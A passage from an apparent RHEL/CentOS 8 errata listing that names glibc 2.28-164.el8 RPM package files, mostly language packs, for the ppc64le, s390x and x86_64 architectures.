glibc-langpack-dsb-2.28-164.el8.ppc64le.rpm glibc-langpack-dv-2.28-164.el8.ppc64le.rpm glibc-langpack-dz-2.28-164.el8.ppc64le.rpm glibc-langpack-el-2.28-164.el8.ppc64le.rpm glibc-langpack-en-2.28-164.el8.ppc64le.rpm glibc-langpack-eo-2.28-164.el8.ppc64le.rpm glibc-langpack-es-2.28-164.el8.ppc64le.rpm glibc-langpack-et-2.28-164.el8.ppc64le.rpm glibc-langpack-eu-2.28-164.el8.ppc64le.rpm glibc-langpack-fa-2.28-164.el8.ppc64le.rpm glibc-langpack-ff-2.28-164.el8.ppc64le.rpm glibc-langpack-fi-2.28-164.el8.ppc64le.rpm glibc-langpack-fil-2.28-164.el8.ppc64le.rpm glibc-langpack-fo-2.28-164.el8.ppc64le.rpm glibc-langpack-fr-2.28-164.el8.ppc64le.rpm glibc-langpack-fur-2.28-164.el8.ppc64le.rpm glibc-langpack-fy-2.28-164.el8.ppc64le.rpm glibc-langpack-ga-2.28-164.el8.ppc64le.rpm glibc-langpack-gd-2.28-164.el8.ppc64le.rpm glibc-langpack-gez-2.28-164.el8.ppc64le.rpm glibc-langpack-gl-2.28-164.el8.ppc64le.rpm glibc-langpack-gu-2.28-164.el8.ppc64le.rpm glibc-langpack-gv-2.28-164.el8.ppc64le.rpm glibc-langpack-ha-2.28-164.el8.ppc64le.rpm glibc-langpack-hak-2.28-164.el8.ppc64le.rpm glibc-langpack-he-2.28-164.el8.ppc64le.rpm glibc-langpack-hi-2.28-164.el8.ppc64le.rpm glibc-langpack-hif-2.28-164.el8.ppc64le.rpm glibc-langpack-hne-2.28-164.el8.ppc64le.rpm glibc-langpack-hr-2.28-164.el8.ppc64le.rpm glibc-langpack-hsb-2.28-164.el8.ppc64le.rpm glibc-langpack-ht-2.28-164.el8.ppc64le.rpm glibc-langpack-hu-2.28-164.el8.ppc64le.rpm glibc-langpack-hy-2.28-164.el8.ppc64le.rpm glibc-langpack-ia-2.28-164.el8.ppc64le.rpm glibc-langpack-id-2.28-164.el8.ppc64le.rpm glibc-langpack-ig-2.28-164.el8.ppc64le.rpm glibc-langpack-ik-2.28-164.el8.ppc64le.rpm glibc-langpack-is-2.28-164.el8.ppc64le.rpm glibc-langpack-it-2.28-164.el8.ppc64le.rpm glibc-langpack-iu-2.28-164.el8.ppc64le.rpm glibc-langpack-ja-2.28-164.el8.ppc64le.rpm glibc-langpack-ka-2.28-164.el8.ppc64le.rpm glibc-langpack-kab-2.28-164.el8.ppc64le.rpm glibc-langpack-kk-2.28-164.el8.ppc64le.rpm glibc-langpack-kl-2.28-164.el8.ppc64le.rpm glibc-langpack-km-2.28-164.el8.ppc64le.rpm glibc-langpack-kn-2.28-164.el8.ppc64le.rpm glibc-langpack-ko-2.28-164.el8.ppc64le.rpm glibc-langpack-kok-2.28-164.el8.ppc64le.rpm glibc-langpack-ks-2.28-164.el8.ppc64le.rpm glibc-langpack-ku-2.28-164.el8.ppc64le.rpm glibc-langpack-kw-2.28-164.el8.ppc64le.rpm glibc-langpack-ky-2.28-164.el8.ppc64le.rpm glibc-langpack-lb-2.28-164.el8.ppc64le.rpm glibc-langpack-lg-2.28-164.el8.ppc64le.rpm glibc-langpack-li-2.28-164.el8.ppc64le.rpm glibc-langpack-lij-2.28-164.el8.ppc64le.rpm glibc-langpack-ln-2.28-164.el8.ppc64le.rpm glibc-langpack-lo-2.28-164.el8.ppc64le.rpm glibc-langpack-lt-2.28-164.el8.ppc64le.rpm glibc-langpack-lv-2.28-164.el8.ppc64le.rpm glibc-langpack-lzh-2.28-164.el8.ppc64le.rpm glibc-langpack-mag-2.28-164.el8.ppc64le.rpm glibc-langpack-mai-2.28-164.el8.ppc64le.rpm glibc-langpack-mfe-2.28-164.el8.ppc64le.rpm glibc-langpack-mg-2.28-164.el8.ppc64le.rpm glibc-langpack-mhr-2.28-164.el8.ppc64le.rpm glibc-langpack-mi-2.28-164.el8.ppc64le.rpm glibc-langpack-miq-2.28-164.el8.ppc64le.rpm glibc-langpack-mjw-2.28-164.el8.ppc64le.rpm glibc-langpack-mk-2.28-164.el8.ppc64le.rpm glibc-langpack-ml-2.28-164.el8.ppc64le.rpm glibc-langpack-mn-2.28-164.el8.ppc64le.rpm glibc-langpack-mni-2.28-164.el8.ppc64le.rpm glibc-langpack-mr-2.28-164.el8.ppc64le.rpm glibc-langpack-ms-2.28-164.el8.ppc64le.rpm glibc-langpack-mt-2.28-164.el8.ppc64le.rpm glibc-langpack-my-2.28-164.el8.ppc64le.rpm glibc-langpack-nan-2.28-164.el8.ppc64le.rpm glibc-langpack-nb-2.28-164.el8.ppc64le.rpm glibc-langpack-nds-2.28-164.el8.ppc64le.rpm glibc-langpack-ne-2.28-164.el8.ppc64le.rpm glibc-langpack-nhn-2.28-164.el8.ppc64le.rpm glibc-langpack-niu-2.28-164.el8.ppc64le.rpm glibc-langpack-nl-2.28-164.el8.ppc64le.rpm glibc-langpack-nn-2.28-164.el8.ppc64le.rpm glibc-langpack-nr-2.28-164.el8.ppc64le.rpm glibc-langpack-nso-2.28-164.el8.ppc64le.rpm glibc-langpack-oc-2.28-164.el8.ppc64le.rpm glibc-langpack-om-2.28-164.el8.ppc64le.rpm glibc-langpack-or-2.28-164.el8.ppc64le.rpm glibc-langpack-os-2.28-164.el8.ppc64le.rpm glibc-langpack-pa-2.28-164.el8.ppc64le.rpm glibc-langpack-pap-2.28-164.el8.ppc64le.rpm glibc-langpack-pl-2.28-164.el8.ppc64le.rpm glibc-langpack-ps-2.28-164.el8.ppc64le.rpm glibc-langpack-pt-2.28-164.el8.ppc64le.rpm glibc-langpack-quz-2.28-164.el8.ppc64le.rpm glibc-langpack-raj-2.28-164.el8.ppc64le.rpm glibc-langpack-ro-2.28-164.el8.ppc64le.rpm glibc-langpack-ru-2.28-164.el8.ppc64le.rpm glibc-langpack-rw-2.28-164.el8.ppc64le.rpm glibc-langpack-sa-2.28-164.el8.ppc64le.rpm glibc-langpack-sah-2.28-164.el8.ppc64le.rpm glibc-langpack-sat-2.28-164.el8.ppc64le.rpm glibc-langpack-sc-2.28-164.el8.ppc64le.rpm glibc-langpack-sd-2.28-164.el8.ppc64le.rpm glibc-langpack-se-2.28-164.el8.ppc64le.rpm glibc-langpack-sgs-2.28-164.el8.ppc64le.rpm glibc-langpack-shn-2.28-164.el8.ppc64le.rpm glibc-langpack-shs-2.28-164.el8.ppc64le.rpm glibc-langpack-si-2.28-164.el8.ppc64le.rpm glibc-langpack-sid-2.28-164.el8.ppc64le.rpm glibc-langpack-sk-2.28-164.el8.ppc64le.rpm glibc-langpack-sl-2.28-164.el8.ppc64le.rpm glibc-langpack-sm-2.28-164.el8.ppc64le.rpm glibc-langpack-so-2.28-164.el8.ppc64le.rpm glibc-langpack-sq-2.28-164.el8.ppc64le.rpm glibc-langpack-sr-2.28-164.el8.ppc64le.rpm glibc-langpack-ss-2.28-164.el8.ppc64le.rpm glibc-langpack-st-2.28-164.el8.ppc64le.rpm glibc-langpack-sv-2.28-164.el8.ppc64le.rpm glibc-langpack-sw-2.28-164.el8.ppc64le.rpm glibc-langpack-szl-2.28-164.el8.ppc64le.rpm glibc-langpack-ta-2.28-164.el8.ppc64le.rpm glibc-langpack-tcy-2.28-164.el8.ppc64le.rpm glibc-langpack-te-2.28-164.el8.ppc64le.rpm glibc-langpack-tg-2.28-164.el8.ppc64le.rpm glibc-langpack-th-2.28-164.el8.ppc64le.rpm glibc-langpack-the-2.28-164.el8.ppc64le.rpm glibc-langpack-ti-2.28-164.el8.ppc64le.rpm glibc-langpack-tig-2.28-164.el8.ppc64le.rpm glibc-langpack-tk-2.28-164.el8.ppc64le.rpm glibc-langpack-tl-2.28-164.el8.ppc64le.rpm glibc-langpack-tn-2.28-164.el8.ppc64le.rpm glibc-langpack-to-2.28-164.el8.ppc64le.rpm glibc-langpack-tpi-2.28-164.el8.ppc64le.rpm glibc-langpack-tr-2.28-164.el8.ppc64le.rpm glibc-langpack-ts-2.28-164.el8.ppc64le.rpm glibc-langpack-tt-2.28-164.el8.ppc64le.rpm glibc-langpack-ug-2.28-164.el8.ppc64le.rpm glibc-langpack-uk-2.28-164.el8.ppc64le.rpm glibc-langpack-unm-2.28-164.el8.ppc64le.rpm glibc-langpack-ur-2.28-164.el8.ppc64le.rpm glibc-langpack-uz-2.28-164.el8.ppc64le.rpm glibc-langpack-ve-2.28-164.el8.ppc64le.rpm glibc-langpack-vi-2.28-164.el8.ppc64le.rpm glibc-langpack-wa-2.28-164.el8.ppc64le.rpm glibc-langpack-wae-2.28-164.el8.ppc64le.rpm glibc-langpack-wal-2.28-164.el8.ppc64le.rpm glibc-langpack-wo-2.28-164.el8.ppc64le.rpm glibc-langpack-xh-2.28-164.el8.ppc64le.rpm glibc-langpack-yi-2.28-164.el8.ppc64le.rpm glibc-langpack-yo-2.28-164.el8.ppc64le.rpm glibc-langpack-yue-2.28-164.el8.ppc64le.rpm glibc-langpack-yuw-2.28-164.el8.ppc64le.rpm glibc-langpack-zh-2.28-164.el8.ppc64le.rpm glibc-langpack-zu-2.28-164.el8.ppc64le.rpm glibc-locale-source-2.28-164.el8.ppc64le.rpm glibc-minimal-langpack-2.28-164.el8.ppc64le.rpm libnsl-2.28-164.el8.ppc64le.rpm nscd-2.28-164.el8.ppc64le.rpm nss_db-2.28-164.el8.ppc64le.rpm
s390x: glibc-2.28-164.el8.s390x.rpm glibc-all-langpacks-2.28-164.el8.s390x.rpm glibc-common-2.28-164.el8.s390x.rpm glibc-debuginfo-2.28-164.el8.s390x.rpm glibc-debuginfo-common-2.28-164.el8.s390x.rpm glibc-devel-2.28-164.el8.s390x.rpm glibc-headers-2.28-164.el8.s390x.rpm glibc-langpack-aa-2.28-164.el8.s390x.rpm glibc-langpack-af-2.28-164.el8.s390x.rpm glibc-langpack-agr-2.28-164.el8.s390x.rpm glibc-langpack-ak-2.28-164.el8.s390x.rpm glibc-langpack-am-2.28-164.el8.s390x.rpm glibc-langpack-an-2.28-164.el8.s390x.rpm glibc-langpack-anp-2.28-164.el8.s390x.rpm glibc-langpack-ar-2.28-164.el8.s390x.rpm glibc-langpack-as-2.28-164.el8.s390x.rpm glibc-langpack-ast-2.28-164.el8.s390x.rpm glibc-langpack-ayc-2.28-164.el8.s390x.rpm glibc-langpack-az-2.28-164.el8.s390x.rpm glibc-langpack-be-2.28-164.el8.s390x.rpm glibc-langpack-bem-2.28-164.el8.s390x.rpm glibc-langpack-ber-2.28-164.el8.s390x.rpm glibc-langpack-bg-2.28-164.el8.s390x.rpm glibc-langpack-bhb-2.28-164.el8.s390x.rpm glibc-langpack-bho-2.28-164.el8.s390x.rpm glibc-langpack-bi-2.28-164.el8.s390x.rpm glibc-langpack-bn-2.28-164.el8.s390x.rpm glibc-langpack-bo-2.28-164.el8.s390x.rpm glibc-langpack-br-2.28-164.el8.s390x.rpm glibc-langpack-brx-2.28-164.el8.s390x.rpm glibc-langpack-bs-2.28-164.el8.s390x.rpm glibc-langpack-byn-2.28-164.el8.s390x.rpm glibc-langpack-ca-2.28-164.el8.s390x.rpm glibc-langpack-ce-2.28-164.el8.s390x.rpm glibc-langpack-chr-2.28-164.el8.s390x.rpm glibc-langpack-cmn-2.28-164.el8.s390x.rpm glibc-langpack-crh-2.28-164.el8.s390x.rpm glibc-langpack-cs-2.28-164.el8.s390x.rpm glibc-langpack-csb-2.28-164.el8.s390x.rpm glibc-langpack-cv-2.28-164.el8.s390x.rpm glibc-langpack-cy-2.28-164.el8.s390x.rpm glibc-langpack-da-2.28-164.el8.s390x.rpm glibc-langpack-de-2.28-164.el8.s390x.rpm glibc-langpack-doi-2.28-164.el8.s390x.rpm glibc-langpack-dsb-2.28-164.el8.s390x.rpm glibc-langpack-dv-2.28-164.el8.s390x.rpm glibc-langpack-dz-2.28-164.el8.s390x.rpm glibc-langpack-el-2.28-164.el8.s390x.rpm glibc-langpack-en-2.28-164.el8.s390x.rpm glibc-langpack-eo-2.28-164.el8.s390x.rpm glibc-langpack-es-2.28-164.el8.s390x.rpm glibc-langpack-et-2.28-164.el8.s390x.rpm glibc-langpack-eu-2.28-164.el8.s390x.rpm glibc-langpack-fa-2.28-164.el8.s390x.rpm glibc-langpack-ff-2.28-164.el8.s390x.rpm glibc-langpack-fi-2.28-164.el8.s390x.rpm glibc-langpack-fil-2.28-164.el8.s390x.rpm glibc-langpack-fo-2.28-164.el8.s390x.rpm glibc-langpack-fr-2.28-164.el8.s390x.rpm glibc-langpack-fur-2.28-164.el8.s390x.rpm glibc-langpack-fy-2.28-164.el8.s390x.rpm glibc-langpack-ga-2.28-164.el8.s390x.rpm glibc-langpack-gd-2.28-164.el8.s390x.rpm glibc-langpack-gez-2.28-164.el8.s390x.rpm glibc-langpack-gl-2.28-164.el8.s390x.rpm glibc-langpack-gu-2.28-164.el8.s390x.rpm glibc-langpack-gv-2.28-164.el8.s390x.rpm glibc-langpack-ha-2.28-164.el8.s390x.rpm glibc-langpack-hak-2.28-164.el8.s390x.rpm glibc-langpack-he-2.28-164.el8.s390x.rpm glibc-langpack-hi-2.28-164.el8.s390x.rpm glibc-langpack-hif-2.28-164.el8.s390x.rpm glibc-langpack-hne-2.28-164.el8.s390x.rpm glibc-langpack-hr-2.28-164.el8.s390x.rpm glibc-langpack-hsb-2.28-164.el8.s390x.rpm glibc-langpack-ht-2.28-164.el8.s390x.rpm glibc-langpack-hu-2.28-164.el8.s390x.rpm glibc-langpack-hy-2.28-164.el8.s390x.rpm glibc-langpack-ia-2.28-164.el8.s390x.rpm glibc-langpack-id-2.28-164.el8.s390x.rpm glibc-langpack-ig-2.28-164.el8.s390x.rpm glibc-langpack-ik-2.28-164.el8.s390x.rpm glibc-langpack-is-2.28-164.el8.s390x.rpm glibc-langpack-it-2.28-164.el8.s390x.rpm glibc-langpack-iu-2.28-164.el8.s390x.rpm glibc-langpack-ja-2.28-164.el8.s390x.rpm glibc-langpack-ka-2.28-164.el8.s390x.rpm glibc-langpack-kab-2.28-164.el8.s390x.rpm glibc-langpack-kk-2.28-164.el8.s390x.rpm glibc-langpack-kl-2.28-164.el8.s390x.rpm glibc-langpack-km-2.28-164.el8.s390x.rpm glibc-langpack-kn-2.28-164.el8.s390x.rpm glibc-langpack-ko-2.28-164.el8.s390x.rpm glibc-langpack-kok-2.28-164.el8.s390x.rpm glibc-langpack-ks-2.28-164.el8.s390x.rpm glibc-langpack-ku-2.28-164.el8.s390x.rpm glibc-langpack-kw-2.28-164.el8.s390x.rpm glibc-langpack-ky-2.28-164.el8.s390x.rpm glibc-langpack-lb-2.28-164.el8.s390x.rpm glibc-langpack-lg-2.28-164.el8.s390x.rpm glibc-langpack-li-2.28-164.el8.s390x.rpm glibc-langpack-lij-2.28-164.el8.s390x.rpm glibc-langpack-ln-2.28-164.el8.s390x.rpm glibc-langpack-lo-2.28-164.el8.s390x.rpm glibc-langpack-lt-2.28-164.el8.s390x.rpm glibc-langpack-lv-2.28-164.el8.s390x.rpm glibc-langpack-lzh-2.28-164.el8.s390x.rpm glibc-langpack-mag-2.28-164.el8.s390x.rpm glibc-langpack-mai-2.28-164.el8.s390x.rpm glibc-langpack-mfe-2.28-164.el8.s390x.rpm glibc-langpack-mg-2.28-164.el8.s390x.rpm glibc-langpack-mhr-2.28-164.el8.s390x.rpm glibc-langpack-mi-2.28-164.el8.s390x.rpm glibc-langpack-miq-2.28-164.el8.s390x.rpm glibc-langpack-mjw-2.28-164.el8.s390x.rpm glibc-langpack-mk-2.28-164.el8.s390x.rpm glibc-langpack-ml-2.28-164.el8.s390x.rpm glibc-langpack-mn-2.28-164.el8.s390x.rpm glibc-langpack-mni-2.28-164.el8.s390x.rpm glibc-langpack-mr-2.28-164.el8.s390x.rpm glibc-langpack-ms-2.28-164.el8.s390x.rpm glibc-langpack-mt-2.28-164.el8.s390x.rpm glibc-langpack-my-2.28-164.el8.s390x.rpm glibc-langpack-nan-2.28-164.el8.s390x.rpm glibc-langpack-nb-2.28-164.el8.s390x.rpm glibc-langpack-nds-2.28-164.el8.s390x.rpm glibc-langpack-ne-2.28-164.el8.s390x.rpm glibc-langpack-nhn-2.28-164.el8.s390x.rpm glibc-langpack-niu-2.28-164.el8.s390x.rpm glibc-langpack-nl-2.28-164.el8.s390x.rpm glibc-langpack-nn-2.28-164.el8.s390x.rpm glibc-langpack-nr-2.28-164.el8.s390x.rpm glibc-langpack-nso-2.28-164.el8.s390x.rpm glibc-langpack-oc-2.28-164.el8.s390x.rpm glibc-langpack-om-2.28-164.el8.s390x.rpm glibc-langpack-or-2.28-164.el8.s390x.rpm glibc-langpack-os-2.28-164.el8.s390x.rpm glibc-langpack-pa-2.28-164.el8.s390x.rpm glibc-langpack-pap-2.28-164.el8.s390x.rpm glibc-langpack-pl-2.28-164.el8.s390x.rpm glibc-langpack-ps-2.28-164.el8.s390x.rpm glibc-langpack-pt-2.28-164.el8.s390x.rpm glibc-langpack-quz-2.28-164.el8.s390x.rpm glibc-langpack-raj-2.28-164.el8.s390x.rpm glibc-langpack-ro-2.28-164.el8.s390x.rpm glibc-langpack-ru-2.28-164.el8.s390x.rpm glibc-langpack-rw-2.28-164.el8.s390x.rpm glibc-langpack-sa-2.28-164.el8.s390x.rpm glibc-langpack-sah-2.28-164.el8.s390x.rpm glibc-langpack-sat-2.28-164.el8.s390x.rpm glibc-langpack-sc-2.28-164.el8.s390x.rpm glibc-langpack-sd-2.28-164.el8.s390x.rpm glibc-langpack-se-2.28-164.el8.s390x.rpm glibc-langpack-sgs-2.28-164.el8.s390x.rpm glibc-langpack-shn-2.28-164.el8.s390x.rpm glibc-langpack-shs-2.28-164.el8.s390x.rpm glibc-langpack-si-2.28-164.el8.s390x.rpm glibc-langpack-sid-2.28-164.el8.s390x.rpm glibc-langpack-sk-2.28-164.el8.s390x.rpm glibc-langpack-sl-2.28-164.el8.s390x.rpm glibc-langpack-sm-2.28-164.el8.s390x.rpm glibc-langpack-so-2.28-164.el8.s390x.rpm glibc-langpack-sq-2.28-164.el8.s390x.rpm glibc-langpack-sr-2.28-164.el8.s390x.rpm glibc-langpack-ss-2.28-164.el8.s390x.rpm glibc-langpack-st-2.28-164.el8.s390x.rpm glibc-langpack-sv-2.28-164.el8.s390x.rpm glibc-langpack-sw-2.28-164.el8.s390x.rpm glibc-langpack-szl-2.28-164.el8.s390x.rpm glibc-langpack-ta-2.28-164.el8.s390x.rpm glibc-langpack-tcy-2.28-164.el8.s390x.rpm glibc-langpack-te-2.28-164.el8.s390x.rpm glibc-langpack-tg-2.28-164.el8.s390x.rpm glibc-langpack-th-2.28-164.el8.s390x.rpm glibc-langpack-the-2.28-164.el8.s390x.rpm glibc-langpack-ti-2.28-164.el8.s390x.rpm glibc-langpack-tig-2.28-164.el8.s390x.rpm glibc-langpack-tk-2.28-164.el8.s390x.rpm glibc-langpack-tl-2.28-164.el8.s390x.rpm glibc-langpack-tn-2.28-164.el8.s390x.rpm glibc-langpack-to-2.28-164.el8.s390x.rpm glibc-langpack-tpi-2.28-164.el8.s390x.rpm glibc-langpack-tr-2.28-164.el8.s390x.rpm glibc-langpack-ts-2.28-164.el8.s390x.rpm glibc-langpack-tt-2.28-164.el8.s390x.rpm glibc-langpack-ug-2.28-164.el8.s390x.rpm glibc-langpack-uk-2.28-164.el8.s390x.rpm glibc-langpack-unm-2.28-164.el8.s390x.rpm glibc-langpack-ur-2.28-164.el8.s390x.rpm glibc-langpack-uz-2.28-164.el8.s390x.rpm glibc-langpack-ve-2.28-164.el8.s390x.rpm glibc-langpack-vi-2.28-164.el8.s390x.rpm glibc-langpack-wa-2.28-164.el8.s390x.rpm glibc-langpack-wae-2.28-164.el8.s390x.rpm glibc-langpack-wal-2.28-164.el8.s390x.rpm glibc-langpack-wo-2.28-164.el8.s390x.rpm glibc-langpack-xh-2.28-164.el8.s390x.rpm glibc-langpack-yi-2.28-164.el8.s390x.rpm glibc-langpack-yo-2.28-164.el8.s390x.rpm glibc-langpack-yue-2.28-164.el8.s390x.rpm glibc-langpack-yuw-2.28-164.el8.s390x.rpm glibc-langpack-zh-2.28-164.el8.s390x.rpm glibc-langpack-zu-2.28-164.el8.s390x.rpm glibc-locale-source-2.28-164.el8.s390x.rpm glibc-minimal-langpack-2.28-164.el8.s390x.rpm libnsl-2.28-164.el8.s390x.rpm nscd-2.28-164.el8.s390x.rpm nss_db-2.28-164.el8.s390x.rpm
x86_64: glibc-2.28-164.el8.i686.rpm glibc-2.28-164.el8.x86_64.rpm glibc-all-langpacks-2.28-164.el8.x86_64.rpm glibc-common-2.28-164.el8.x86_64.rpm glibc-debuginfo-2.28-164.el8.i686.rpm glibc-debuginfo-2.28-164.el8.x86_64.rpm glibc-debuginfo-common-2.28-164.el8.i686.rpm glibc-debuginfo-common-2.28-164.el8.x86_64.rpm glibc-devel-2.28-164.el8.i686.rpm glibc-devel-2.28-164.el8.x86_64.rpm glibc-headers-2.28-164.el8.i686.rpm glibc-headers-2.28-164.el8.x86_64.rpm glibc-langpack-aa-2.28-164.el8.x86_64.rpm glibc-langpack-af-2.28-164.el8.x86_64.rpm glibc-langpack-agr-2.28-164.el8.x86_64.rpm glibc-langpack-ak-2.28-164.el8.x86_64.rpm glibc-langpack-am-2.28-164.el8.x86_64.rpm glibc-langpack-an-2.28-164.el8.x86_64.rpm glibc-langpack-anp-2.28-164.el8.x86_64.rpm glibc-langpack-ar-2.28-164.el8.x86_64.rpm glibc-langpack-as-2.28-164.el8.x86_64.rpm glibc-langpack-ast-2.28-164.el8.x86_64.rpm glibc-langpack-ayc-2.28-164.el8.x86_64.rpm glibc-langpack-az-2.28-164.el8.x86_64.rpm glibc-langpack-be-2.28-164.el8.x86_64.rpm glibc-langpack-bem-2.28-164.el8.x86_64.rpm glibc-langpack-ber-2.28-164.el8.x86_64.rpm glibc-langpack-bg-2.28-164.el8.x86_64.rpm glibc-langpack-bhb-2.28-164.el8.x86_64.rpm glibc-langpack-bho-2.28-164.el8.x86_64.rpm glibc-langpack-bi-2.28-164.el8.x86_64.rpm glibc-langpack-bn-2.28-164.el8.x86_64.rpm glibc-langpack-bo-2.28-164.el8.x86_64.rpm glibc-langpack-br-2.28-164.el8.x86_64.rpm glibc-langpack-brx-2.28-164.el8.x86_64.rpm glibc-langpack-bs-2.28-164.el8.x86_64.rpm glibc-langpack-byn-2.28-164.el8.x86_64.rpm glibc-langpack-ca-2.28-164.el8.x86_64.rpm glibc-langpack-ce-2.28-164.el8.x86_64.rpm glibc-langpack-chr-2.28-164.el8.x86_64.rpm glibc-langpack-cmn-2.28-164.el8.x86_64.rpm glibc-langpack-crh-2.28-164.el8.x86_64.rpm glibc-langpack-cs-2.28-164.el8.x86_64.rpm glibc-langpack-csb-2.28-164.el8.x86_64.rpm glibc-langpack-cv-2.28-164.el8.x86_64.rpm glibc-langpack-cy-2.28-164.el8.x86_64.rpm glibc-langpack-da-2.28-164.el8.x86_64.rpm glibc-langpack-de-2.28-164.el8.x86_64.rpm glibc-langpack-doi-2.28-164.el8.x86_64.rpm glibc-langpack-dsb-2.28-164.el8.x86_64.rpm glibc-langpack-dv-2.28-164.el8.x86_64.rpm glibc-langpack-dz-2.28-164.el8.x86_64.rpm glibc-langpack-el-2.28-164.el8.x86_64.rpm glibc-langpack-en-2.28-164.el8.x86_64.rpm glibc-langpack-eo-2.28-164.el8.x86_64.rpm glibc-langpack-es-2.28-164.el8.x86_64.rpm glibc-langpack-et-2.28-164.el8.x86_64.rpm glibc-langpack-eu-2.28-164.el8.x86_64.rpm glibc-langpack-fa-2.28-164.el8.x86_64.rpm glibc-langpack-ff-2.28-164.el8.x86_64.rpm glibc-langpack-fi-2.28-164.el8.x86_64.rpm glibc-langpack-fil-2.28-164.el8.x86_64.rpm glibc-langpack-fo-2.28-164.el8.x86_64.rpm glibc-langpack-fr-2.28-164.el8.x86_64.rpm glibc-langpack-fur-2.28-164.el8.x86_64.rpm glibc-langpack-fy-2.28-164.el8.x86_64.rpm glibc-langpack-ga-2.28-164.el8.x86_64.rpm glibc-langpack-gd-2.28-164.el8.x86_64.rpm glibc-langpack-gez-2.28-164.el8.x86_64.rpm glibc-langpack-gl-2.28-164.el8.x86_64.rpm glibc-langpack-gu-2.28-164.el8.x86_64.rpm glibc-langpack-gv-2.28-164.el8.x86_64.rpm glibc-langpack-ha-2.28-164.el8.x86_64.rpm glibc-langpack-hak-2.28-164.el8.x86_64.rpm glibc-langpack-he-2.28-164.el8.x86_64.rpm glibc-langpack-hi-2.28-164.el8.x86_64.rpm glibc-langpack-hif-2.28-164.el8.x86_64.rpm glibc-langpack-hne-2.28-164.el8.x86_64.rpm glibc-langpack-hr-2.28-164.el8.x86_64.rpm glibc-langpack-hsb-2.28-164.el8.x86_64.rpm glibc-langpack-ht-2.28-164.el8.x86_64.rpm glibc-langpack-hu-2.28-164.el8.x86_64.rpm glibc-langpack-hy-2.28-164.el8.x86_64.rpm glibc-langpack-ia-2.28-164.el8.x86_64.rpm glibc-langpack-id-2.28-164.el8.x86_64.rpm glibc-langpack-ig-2.28-164.el8.x86_64.rpm glibc-langpack-ik-2.28-164.el8.x86_64.rpm glibc-langpack-is-2.28-164.el8.x86_64.rpm glibc-langpack-it-2.28-164.el8.x86_64.rpm glibc-langpack-iu-2.28-164.el8.x86_64.rpm glibc-langpack-ja-2.28-164.el8.x86_64.rpm glibc-langpack-ka-2.28-164.el8.x86_64.rpm glibc-langpack-kab-2.28-164.el8.x86_64.rpm glibc-langpack-kk-2.28-164.el8.x86_64.rpm glibc-langpack-kl-2.28-164.el8.x86_64.rpm glibc-langpack-km-2.28-164.el8.x86_64.rpm glibc-langpack-kn-2.28-164.el8.x86_64.rpm glibc-langpack-ko-2.28-164.el8.x86_64.rpm glibc-langpack-kok-2.28-164.el8.x86_64.rpm glibc-langpack-ks-2.28-164.el8.x86_64.rpm glibc-langpack-ku-2.28-164.el8.x86_64.rpm glibc-langpack-kw-2.28-164.el8.x86_64.rpm glibc-langpack-ky-2.28-164.el8.x86_64.rpm glibc-langpack-lb-2.28-164.el8.x86_64.rpm glibc-langpack-lg-2.28-164.el8.x86_64.rpm glibc-langpack-li-2.28-164.el8.x86_64.rpm glibc-langpack-lij-2.28-164.el8.x86_64.rpm glibc-langpack-ln-2.28-164.el8.x86_64.rpm glibc-langpack-lo-2.28-164.el8.x86_64.rpm glibc-langpack-lt-2.28-164.el8.x86_64.rpm glibc-langpack-lv-2.28-164.el8.x86_64.rpm glibc-langpack-lzh-2.28-164.el8.x86_64.rpm glibc-langpack-mag-2.28-164.el8.x86_64.rpm glibc-langpack-mai-2.28-164.el8.x86_64.rpm glibc-langpack-mfe-2.28-164.el8.x86_64.rpm glibc-langpack-mg-2.28-164.el8.x86_64.rpm glibc-langpack-mhr-2.28-164.el8.x86_64.rpm glibc-langpack-mi-2.28-164.el8.x86_64.rpm glibc-langpack-miq-2.28-164.el8.x86_64.rpm glibc-langpack-mjw-2.28-164.el8.x86_64.rpm glibc-langpack-mk-2.28-164.el8.x86_64.rpm glibc-langpack-ml-2.28-164.el8.x86_64.rpm glibc-langpack-mn-2.28-164.el8.x86_64.rpm glibc-langpack-mni-2.28-164.el8.x86_64.rpm glibc-langpack-mr-2.28-164.el8.x86_64.rpm glibc-langpack-ms-2.28-164.el8.x86_64.rpm glibc-langpack-mt-2.28-164.el8.x86_64.rpm glibc-langpack-my-2.28-164.el8.x86_64.rpm glibc-langpack-nan-2.28-164.el8.x86_64.rpm glibc-langpack-nb-2.28-164.el8.x86_64.rpm glibc-langpack-nds-2.28-164.el8.x86_64.rpm glibc-langpack-ne-2.28-164.el8.x86_64.rpm glibc-langpack-nhn-2.28-164.el8.x86_64.rpm glibc-langpack-niu-2.28-164.el8.x86_64.rpm glibc-langpack-nl-2.28-164.el8.x86_64.rpm glibc-langpack-nn-2.28-164.el8.x86_64.rpm glibc-langpack-nr-2.28-164.el8.x86_64.rpm glibc-langpack-nso-2.28-164.el8.x86_64.rpm glibc-langpack-oc-2.28-164.el8.x86_64.rpm glibc-langpack-om-2.28-164.el8.x86_64.rpm glibc-langpack-or-2.28-164.el8.x86_64.rpm glibc-langpack-os-2.28-164.el8.x86_64.rpm glibc-langpack-pa-2.28-164.el8.x86_64.rpm glibc-langpack-pap-2.28-164.el8.x86_64.rpm glibc-langpack-pl-2.28-164.el8.x86_64.rpm glibc-langpack-ps-2.28-164.el8.x86_64.rpm glibc-langpack-pt-2.28-164.el8.x86_64.rpm glibc-langpack-quz-2.28-164.el8.x86_64.rpm glibc-langpack-raj-2.28-164.el8.x86_64.rpm glibc-langpack-ro-2.28-164.el8.x86_64.rpm glibc-langpack-ru-2.28-164.el8.x86_64.rpm glibc-langpack-rw-2.28-164.el8.x86_64.rpm glibc-langpack-sa-2.28-164.el8.x86_64.rpm glibc-langpack-sah-2.28-164.el8.x86_64.rpm glibc-langpack-sat-2.28-164.el8.x86_64.rpm glibc-langpack-sc-2.28-164.el8.x86_64.rpm glibc-langpack-sd-2.28-164.el8.x86_64.rpm glibc-langpack-se-2.28-164.el8.x86_64.rpm glibc-langpack-sgs-2.28-164.el8.x86_64.rpm glibc-langpack-shn-2.28-164.el8.x86_64.rpm glibc-langpack-shs-2.28-164.el8.x86_64.rpm glibc-langpack-si-2.28-164.el8.x86_64.rpm glibc-langpack-sid-2.28-164.el8.x86_64.rpm glibc-langpack-sk-2.28-164.el8.x86_64.rpm glibc-langpack-sl-2.28-164.el8.x86_64.rpm glibc-langpack-sm-2.28-164.el8.x86_64.rpm glibc-langpack-so-2.28-164.el8.x86_64.rpm glibc-langpack-sq-2.28-164.el8.x86_64.rpm glibc-langpack-sr-2.28-164.el8.x86_64.rpm glibc-langpack-ss-2.28-164.el8.x86_64.rpm 